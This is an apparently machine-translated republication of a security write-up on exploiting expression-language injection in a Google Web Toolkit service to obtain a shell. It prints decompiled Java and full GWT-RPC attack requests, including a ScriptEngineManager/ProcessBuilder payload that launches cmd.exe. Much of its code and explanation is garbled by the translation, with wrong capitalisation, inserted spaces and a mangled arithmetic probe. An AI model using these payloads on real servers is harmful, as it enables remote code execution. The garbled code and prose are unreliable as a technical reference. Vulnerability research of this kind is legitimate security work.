Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to Getshell in the Google Web Toolkit environment". The content in the article is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn "how to Getshell in the Google Web Toolkit environment".

Google Web

Toolkit abbreviation (GWT) is an open source Java software development framework. Today's article will show you how to create high-risk vulnerabilities by injecting expression statements in such an environment.

Introduction of loopholes

In WEB-INF/web.xml, I found the following web endpoint mapping:

SomeServicecom.aaa.bbb.ccc.ddd.server.SomeServiceImplsomeService/someService.gwtsvc

We can see from the above code that the server mapping is referenced. Because GWT can define the client to indicate what access the client can make. Let's take a look at these client classes com.aaa.bbb.ccc.ddd.client:

Public abstract interface SomeService extends RemoteService {public abstract void sendBeanName (String paramString); public abstract Boolean setMibNodesInfo (List paramList); public abstract void createMibNodeGettingBean ();}

From the above code, we can see that there are three functions, so take them out separately and see what their respective functions are. In the main function of ServiceImpl, we find the following code:

Public void sendBeanName (String paramString) {if (paramString = = null) {return;} HttpSession localHttpSession = super.getThreadLocalRequest () .getSession (); if (localHttpSession! = null) {localHttpSession.setAttribute ("MibWidgetBeanName", paramString);}}

In this code, we change the "MibWidgetBeanName" property by entering a string. Apart from this, there seems to be nothing to take advantage of. Let's move on to the setMibNodesInfo function:

Public Boolean setMibNodesInfo (List paramList) {List localList = ModelUtil.mibNodeModelList2MibNodeList (paramList); if (localList! = null) {MibNodesSelect localMibNodesSelect = getBeanByName ()

This function requires a list of MIBNodeModel types. The mibNodeModelList2MibNodeList method checks whether the list we enter conforms to the specification and returns different values based on the value of one element of the list.

If the list is empty, this function defines a new list and sets the content to the default value of MIBNodeModel. The getBeanByName function is then called. Let's take a look at this function.

Private MibNodesSelect getBeanByName () {... Object localObject1 = super.getThreadLocalRequest (). GetSession (); if (localObject1! = null) {localObject2 = (String) ((HttpSession) localObject1) .getAttribute ("MibWidgetBeanName"); if (localObject2! = null) {localObject3 = null; try {localObject3 = (MibNodesSelect) FacesUtils.getValueExpressionObject (localFacesContext, "# {" + (String) localObject2 + "}") } finally {if ((localFacesContext! = null) & & (I! = 0)) {localFacesContext.release ();}} return (MibNodesSelect) localObject3;}} return null;}

Because this is a private function, we cannot see the contents of this function directly through the client. In line 8, we can see that the "MibWidgetBeanName" attribute is used again to store a string in localObject2.

The variable localObject2 will be used later on line 14 to accept a language expression. Obviously, this is a classic expression injection vulnerability, but only if the code is disassembled first.

Attack process

First of all, this is not a language expression injection vulnerability with a return value. This means that you don't know if it has carried out the command you entered. Therefore, I think of it as a blind injection of language expressions.

Let me illustrate with a simple example that if we have such a vulnerability in one of our JSF (java server framework), the vulnerability code will be similar to the following:

Then, the attack can be implemented through the following attack code

Http://[target]/some_endpoint/vuln.jsf?expression=9%3b1

Because the browser converts the "+" sign into a space, we url the "+" sign, and if we get a result of 10, then we know that the server has executed the command "9 percent 1". Injection detection using mathematical expressions is a method for burpsuit to detect injection.

However, in the above code we audit, can we not easily judge whether he has a language expression vulnerability? Of course not. We have other ways. By looking up the JSF documentation, I found some great functions that make it easy to determine whether there is EL injection without issuing a http request.

The Oracle official documentation states that you can use the getExternalContext method in the FacesContext object. This method returns a value of type ExternalContext, which allows us to set the response properties of a specific object. When I looked at the document, these two functions caught my attention:

SetResponseCharacterEncodingredirect

So we can set this particular string to the following java code:

FacesContext.getExternalContext () .redirect ("http://srcincite.io/");

If the response status value is 302 and is redirected to "http://srcincite.io/", then we can determine that a vulnerability exists.

Vulnerability testing

Our first request is to assign the MibWidgetBeanName attribute

POST / someService.gwtsvc HTTP/1.1Host: [target] Accept: * / * X-GWT-Module-Base: X-GWT-Permutation: Cookie: JSESSIONID= [cookie] Content-Type: text/x-gwt-rpc; charset=UTF-8Content-Length: 1956 | 0 | 6 | 45D7850B2B5DB917E4D184D52329B5D9 | com.aaa.bbb.ccc.ddd.client.SomeService | sendBeanName | java.lang.String | facesContext.getExternalContext (). Redirect ("http://srcincite.io/")|1|2|3|4|1|5|6|"

We can see that our attention to GWT has been successful by returning a response of "/ / ok [[], 0JE6]". The second request then triggers the string stored in the session. However, before we send the request, because the setMibNodesInfo function passes in a complex variable type, we need to look at the source code of the protected file to see what types are allowed to be committed. In the [strongname] .gwt.rpc file, I found the type that can be submitted in the array: java.util.ArrayList/382197682.

Now we can send our request data.

POST / someService.gwtsvc HTTP/1.1Host: [target] Accept: * / * X-GWT-Module-Base: X-GWT-Permutation: Cookie: JSESSIONID= [cookie] Content-Type: text/x-gwt-rpc; charset=UTF-8Content-Length: 1716 | 0 | 6 | 45D7850B2B5DB917E4D184D52329B5D9 | com.aaa.bbb.ccc.ddd.client.SomeService | setMibNodesInfo | java.util.List | java.util.ArrayList/3821976829 | 1 | 2 | 4 | 1 | 5 | 6 | 0 |

The correct content of the return packet should be similar to the following:

HTTP/1.1 302 FoundServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID= [cookie]; Path=/; Secure; HttpOnlySet-Cookie: oam.Flash.RENDERMAP.TOKEN=-g9lc30a8l; Path=/; SecurePragma: no-cacheCache-Control: no-cacheExpires: Thu, 01 Jan 1970 00:00:00 GMTPragma: no-cacheLocation: http://srcincite.io/Content-Type: text/html;charset=UTF-8Content-Length: 45Date: Wed, 03 May 2017 18:58:36 GMTConnection: close//OK

Of course, being able to redirect indicates that it has been executed successfully. But what we need is to get shell, http://blog.mindedsecurity.com/2015/11/reliable- in this article

Os-shell-with-el-

Expression.html can use ScriptEngineManager's script to execute java code. But their code is very long, so I used the same method to write one myself.

".getClass (). ForName (" javax.script.ScriptEngineManager "). NewInstance (). GetEngineByName (" JavaScript "). Eval (" var proc=new java.lang.ProcessBuilder [\ "(java.lang.String [])\"] ([\ "cmd.exe\",\ "/ c\",\\ "calc.exe\"]) .start (); ")

Update the MibWidgetBeanName property value, then use setMibNodesInfo again unless this string, and then get system permissions

POST / someService.gwtsvc HTTP/1.1Host: [target] Accept: * / * X-GWT-Module-Base: X-GWT-Permutation: Cookie: JSESSIONID= [cookie] Content-Type: text/x-gwt-rpc Charset=UTF-8Content-Length: 3666 | 0 | 6 | 45D7850B2B5DB917E4D184D52329B5D9 | com.aaa.bbb.ccc.ddd.client.SomeService | sendBeanName | java.lang.String | ".getClass (). ForName (" javax.script.ScriptEngineManager "). NewInstance (). GetEngineByName (" JavaScript "). Eval (" var proc=new java.lang.ProcessBuilder [\ "(java.lang.String [])\"] ([\ "cmd.exe\",\ "/ c\",\\ "calc.exe\"]). Start (); ") | 1 | 2 | 3 | 4 | 1 | 5 | 6 |

Trigger language expression:

POST / someService.gwtsvc HTTP/1.1Host: [target] Accept: * / * X-GWT-Module-Base: X-GWT-Permutation: Cookie: JSESSIONID= [cookie] Content-Type: text/x-gwt-rpc; charset=UTF-8Content-Length: 1716 | 0 | 6 | 45D7850B2B5DB917E4D184D52329B5D9 | com.aaa.bbb.ccc.ddd.client.SomeService | setMibNodesInfo | java.util.List | java.util.ArrayList/3821976829 | 1 | 2 | 4 | 1 | 5 | 6 | 0 |

Conclusion

It is almost impossible to find this vulnerability in black box penetration testing. Tools like burp suite won't find such vulnerabilities, especially when considering that strings are stored in seesion.

With the progress of network technology, we are more and more dependent on automation, and we need more knowledge, skills and tools in this field.

Thank you for your reading, the above is the content of "how to Getshell in the Google Web Toolkit environment", after the study of this article, I believe you have a deeper understanding of how to Getshell in the Google Web Toolkit environment, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.